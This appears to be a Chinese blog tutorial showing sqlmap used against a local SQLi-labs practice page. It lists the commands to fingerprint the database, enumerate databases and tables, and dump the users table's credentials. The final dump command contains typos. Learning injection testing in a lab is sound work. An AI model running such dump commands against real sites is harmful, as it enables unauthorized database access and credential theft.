SQLmap注入

Salmap注入网站

Sqlmap工具简介

sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。

有许多其它SQL 射入工具在网, 但我不能发现任何人适合所有我的需要因此我感到需要在我的渗透测试期间给成功地写我自己的工具测试, 辨认和利用网应用的SQL 射入在安全上的弱点。

什么是SQL注入漏洞

攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。

SQL注入的本质,因服务端没有过滤用户输入的恶意数据,导致把用户输入的数据当作SQL语句执行,从而影响数据库安全和平台安全。

注入实操

接下来用小皮系统搭建的一个sql环境
在这里插入图片描述
打开less-1第一个页面
在这里插入图片描述
页面显示输入ID参数提交
这里输入?id=5
在这里插入图片描述
可以看到页面发生变化,出来了一个登录名和登录密码
利用这个注入点进行下一步爆破
打开我尘封已久的sqlmap工具
在这里插入图片描述
我这里sqlmap必须在python环境下才可使用。
python sqlmap.py -u "http://localhost:8081/Less-1/?id=5"
查看到了数据库的版本号
在这里插入图片描述
下一步爆破,爆破数据库库名
python sqlmap.py -u "http://localhost:8081/Less-1/?id=5" --dbs
在这里插入图片描述
这里我选择security进行爆破
python sqlmap.py -u "http://localhost:8081/Less-1/?id=5" -D security --tables
在这里插入图片描述
可以看到该表中有两行列,接下来对列进行爆破
python sqlmap.py -u "http://localhost:8081/Less-1/?id=5" -D security -T users -c “password, usernane” --dump
在这里插入图片描述

爆破出列中的数值
在这里插入图片描述
还有更多的功能暂时正在摸索中…

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RAFAraf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值